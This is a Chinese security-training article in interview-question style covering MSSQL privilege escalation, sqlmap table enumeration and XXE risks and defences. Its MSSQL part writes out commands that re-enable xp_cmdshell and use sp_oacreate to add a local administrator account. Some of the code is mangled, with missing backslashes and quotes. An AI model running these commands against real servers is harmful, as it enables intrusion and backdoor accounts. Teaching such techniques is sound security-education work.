热门课程

免费试听

上课方式

开班时间

当前位置: 首页 -   文章 -   新闻动态 -   正文

mssql 提权的提权思路有哪些步骤

知了堂姐
2024-07-08 17:22:16
0

一、mssql 提权的提权思路有哪些步骤?

(1)首先看看 xp_cmdshel 是否 l 存在,不存在的话先恢复,恢复语句如下:

Exec sp_configure show advanced options,1;RECONFIGURE;EXEC

sp_configure xp_cmdshell,1;RECONFIGURE;

;EXEC sp_configure show advanced options, 1;RECONFIGURE;EXEC

sp_configure xp_cmdshell, 1;RECONFIGURE;--

(2)如果 xp_cmdshell 还是不行就再执行命令

;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--

或;sp_addextendedproc xp_cmdshell,@dllname=xplog70.dll 来恢复

cmdshell

(3)无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指

定的程序。)

恢复方法:查询分离器连接后,

第一步执行:exec sp_dropextendedproc xp_cmdshell

第二步执行:exec sp_addextendedproc xp_cmdshell,xpweb70.dll

然后按 F5 键命令执行完毕

(4)终极方法如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:

查询分离器连接后,

2000servser 系统:

declare @shell int exec sp_oacreate wscript.shell,@shell output exec

sp_oamethod @shell,run,null,c:winntsystem32cmd.exe /c net user dell

huxifeng007 /add

declare @shell int exec sp_oacreate wscript.shell,@shell output exec

sp_oamethod @shell,run,null,c:winntsystem32cmd.exe /c net localgroup

administrators dell /add

sql2008 提权 低权限运行

mssql 提权提示错误代码 5,cmd 权限不足的原因?

错误代码”5″,马上 google 之。由于 xp_cmdshell 是严格

用%systemroot%\system32\cmd.exe 去执行所提交的命令的,提示”5″,意

思是 cmd 的权限不足,就是说 system32 下的 cmd.exe 被降权了。当然也有绕

过的方法,比如启用沙盒模式执行 shell 命令


二、怎么用 sqlmap 对 sa 权限的 mssql 2008 进行提权?

(1)第一种函数

select name from sysobjects where xtype=u 通过这个来爆第一个表

select name from sysobjects where xtype=u and name not in(爆出来的表

1,爆出来的表 2...)

一直爆下去,直到找到我们所需要的表位置

(2)第二种函数select table_name from information_schema.tables

select table_name from information_schema.tables where table_name

not in (爆出来的表 1,爆出来的表 2...)

参考文章:http://www.freebuf.com/articles/web/10280.html

三、 xxe 注入有哪些危害以及防御 ?

1)引用外部实体或者

名称 PUBLIC "public_ID" "URI">

当允许引用外部实体时,通过构造恶意内容

(2)可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。

对于不同 XML 解析器,对外部实体有不同处理规则,在 PHP 中默认处理的函数为:

xml_parse 和 simplexml_load xml_parse 的实现方式为 expat 库,默认情况不

会解析外部实体,而 simplexml_load 默认情况下会解析外部实体,造成安全威胁.

除 PHP 外,在 Java,Python 等处理 xml 的组件及函数中都可能存在此问题

https://www.waitalone.cn/xxe-attack.html

XXE 漏洞 http://www.91ri.org/9539.html 

[

(3)防御:

方案一、使用开发语言提供的禁用外部实体的方法

libxml_disable_entity_loader(true);

方案二、过滤用户提交的 XML 数据

1.检查所使用的底层 xml 解析库,默认禁止外部实体的解析2.使用第三方应用代码及时升级补丁

3.同时增强对系统的监控,防止此问题被人利用

对于 PHP,由于 simplexml_load_string 函数的 XML 解析问题出在 libxml 库上,

所以加载实体前可以调用这样一个函数 

大家都在看

知了汇智实践项目走进绵阳师院,助力网络安全实战型...

2024-07-08 浏览次数:0

会话劫持原理

2024-07-08 浏览次数:0

春令营落幕,回顾关键事项,终于懂了选择知了堂的理...

2024-07-08 浏览次数:0

日常羡慕,最高薪资15000

2024-07-08 浏览次数:0

汇智知了堂与四川农业大学信息工程学院签订就业实训...

2024-07-08 浏览次数:0

网络安全岗位解析之安全体系架构师:保护数字世界的...

2024-07-08 浏览次数:0
最新资讯